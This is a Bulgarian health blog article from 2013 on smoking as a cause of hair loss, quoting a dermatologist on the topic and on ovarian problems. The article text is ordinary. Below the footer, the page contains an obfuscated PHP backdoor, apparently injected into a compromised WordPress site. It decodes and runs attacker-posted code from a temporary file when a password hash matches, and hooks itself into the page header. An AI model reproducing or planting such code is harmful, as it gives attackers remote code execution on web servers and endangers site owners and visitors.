Пушенето е рисков фактор за косопад | Косопад

Пушачите са застрашени от косопад

Пушенето на цигари задълбочава и ускорява проблемите с косата

косопад и пушене

Косопад и пушене

Употребата на тютюн ускорява и задълбочава проблемите с косата. Никотинът е сериозен фактор и предпоставка за поява на косопад, защото затруднява храненето на тъканите, блокира растежа и производството на необходимите за добро състояние вещества.

Освен това, тютюнът има зловредно влияние и върху цялото тяло. Ако пациентът страда от други предизвикващи косопад болести, пушенето на цигари ще засили симптомите на проблема и ще направи лечението в пъти по – трудно.

Лекари споделят, че в последно време зачестяват случаите на интензивен косопад дори и сред младите хора. Най – често обаче се забелязва сред тези, които водят нездравословен начин на живот, пушат по много, употребяват алкохол и наркотични вещества.

пушене и косопад

Води ли пушенето до косапад

„Косопад се появява по много причини, но тютюнопушенето съвсем не е за пренебрегване. Наскоро имахме случай на заклет пушач, чиято коса беше в отчайващо състояние. Той така или иначе не успя да спре цигарите напълно, но ги намали драстично и скоро косата му започна да се сгъстява”, каза доц. Мирослава Ковачева от ВМА.

Специалистът – дерматолог припомни, че при дамите косопад се появява често и при проблеми с яйчниците. В тези случаи има и допълнителен симптом – акне, така че ако забележите подобно състояние при вас, незабавно потърсете квалифицирана помощ. Защото в повечето случаи подобни проблеми с органите за възпроизвеждане могат да предизвикат и невъзможност за забременяване, което е истински ужас за 99 % от жените.

28. май 2013 15:07:24 от Косопад
Категории: Косопад – Статии | Етикети: , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}